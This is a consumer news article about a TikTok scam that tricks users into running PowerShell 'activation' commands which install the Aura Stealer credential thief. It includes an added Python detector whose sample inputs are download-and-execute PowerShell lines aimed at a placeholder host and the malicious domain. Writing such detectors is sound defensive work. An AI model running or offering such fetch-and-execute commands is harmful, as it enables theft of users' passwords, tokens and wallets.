TikTok malware scam tricks you with fake activation guides



Cybercriminals are once again turning TikTok into a trap for unsuspecting users. This time, they are disguising malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.

Security expert Xavier Mertens was the first to spot the campaign and confirmed that the same type of scheme had been seen earlier this year. According to BleepingComputer, these fake TikTok videos show short PowerShell commands and instruct viewers to run them as administrators to “activate” or “fix” their programs.

In reality, those commands connect to a malicious website and download malware known as Aura Stealer, which silently extracts saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.

Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join my CYBERGUY.COM newsletter.



Cybercriminals use fake TikTok videos to trick users into downloading malware disguised as free activation guides. (Kurt “CyberGuy” Knutsson)

How the TikTok scam works

This campaign uses what experts call a ClickFix attack. It is a social engineering trick that makes victims feel like they are following legitimate technical instructions. The instructions seem quick and easy: run a short command and get instant access to the premium software.

But instead of activating anything, the PowerShell command connects to a remote domain called slmgr[.]win, which downloads harmful executables from pages hosted on Cloudflare. The main file, updater.exe, is a variant of the Aura Stealer malware. Once inside the system, it looks for your credentials and sends them back to the attacker.

Another file, source.exe, uses Microsoft’s C# compiler to run code directly in memory, making it even harder to detect. The purpose of this additional payload is not yet fully known, but the pattern follows previous malware used for cryptocurrency theft and ransomware delivery.
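As an added illustration (not from the original article or from the researchers it cites), this Python example shows how a defender could flag the pattern described above in PowerShell script-block logs: a fetch of remote content combined with Invoke-Expression, or any reference to the slmgr[.]win domain named in the article. The sample log text, the `example.test` hosts and the function names are constructed for the example.

```python
import re

# Indicator from the article, written there in defanged form as slmgr[.]win.
IOC_DOMAINS = ["slmgr.win"]

# Anything that fetches remote content (cmdlets, aliases, WebClient methods).
FETCH = re.compile(
    r"\b(?:irm|iwr|curl|wget|Invoke-RestMethod|Invoke-WebRequest"
    r"|DownloadString|DownloadData)\b", re.I)
# Anything that runs a string as PowerShell code.
EXEC = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)


def ioc_pattern(domain):
    # Match the domain or a subdomain as a host, but not look-alikes such as
    # slmgr.window or slmgr.win.example.test.
    return re.compile(r"(?<![\w-])" + re.escape(domain) + r"(?![\w.-])", re.I)


IOC_RES = [ioc_pattern(d) for d in IOC_DOMAINS]


def classify(script_text):
    """Return the list of findings for one logged script block."""
    findings = []
    if any(p.search(script_text) for p in IOC_RES):
        findings.append("ioc-domain")
    if FETCH.search(script_text) and EXEC.search(script_text):
        findings.append("download-and-execute")
    return findings


# Constructed sample script-block text (not captured from the campaign).
SAMPLES = [
    "iex (irm https://cdn.example.test/activate)",
    "Invoke-WebRequest https://slmgr.win/PLACEHOLDER -OutFile $env:TEMP\\x.bin",
    "cscript.exe C:\\Windows\\System32\\slmgr.vbs /xpr",
    "Invoke-RestMethod https://api.example.test/status | ConvertTo-Json",
]

if __name__ == "__main__":
    for text in SAMPLES:
        print(classify(text) or ["clean"], "<-", text)
```

The third sample is the legitimate Windows licensing script, slmgr.vbs, whose name the malicious domain imitates; it produces no finding.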


Those short “activation” commands secretly connect to malicious servers that install information-stealing malware like Aura Stealer. (Kurt “CyberGuy” Knutsson)

How to stay safe from TikTok malware scams

Although these scams seem convincing, you can avoid becoming a victim by taking the right precautions.

1) Avoid shortcuts

Never copy or run PowerShell commands from TikTok videos or random websites. If something promises free access to premium software, it’s probably a scam.

2) Use trusted sources

Always download or activate the software directly from the official website or through legitimate app stores.

3) Keep security tools updated

Outdated antivirus software or browsers cannot detect the latest threats. Update your software regularly to stay protected.

4) Use powerful antivirus software

Install powerful antivirus software that offers real-time scanning and protection against Trojans, data stealers, and phishing attempts.

The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com

5) Sign up for a data deletion service

If your personal data ends up on the dark web, a data monitoring or deletion service can alert you and help you remove sensitive information.

While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.

Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com


6) Reset credentials

If you have ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately.

7) Reset passwords

If you have ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately. Start with your email, financial, and social media accounts. Use unique passwords for each site. Consider using a password manager, which stores and generates complex passwords securely, reducing the risk of password reuse.

Next, check to see if your email has been exposed in previous breaches. Our number one password manager (see Cyberguy.com) includes a built-in breach scanner that checks to see if your email address or passwords have appeared in known breaches. If you discover a match, immediately change any reused passwords and protect those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com

8) Enable multi-factor authentication

Add an extra layer of security by enabling multi-factor authentication whenever possible. Even if your passwords are stolen, attackers won’t be able to log in without your verification.


If you followed suspicious steps, change your passwords, enable two-factor authentication, and stay alert for future scams. (Getty Images)

Kurt’s Key Takeaways

TikTok’s global reach makes it a prime target for scams like this. What seems like a useful trick could end up costing you safety, money, and peace of mind. Stay alert, trust only verified sources, and remember that there is no such thing as a free activation shortcut.


Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at Cyberguy.com


Copyright 2025 CyberGuy.com. All rights reserved.

Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and devices that improve lives, with contributions to News and News Business beginning mornings on “News & Friends.” Do you have a tech question? Get Kurt’s free CyberGuy newsletter, or share your voice, a story idea or a comment at CyberGuy.com.
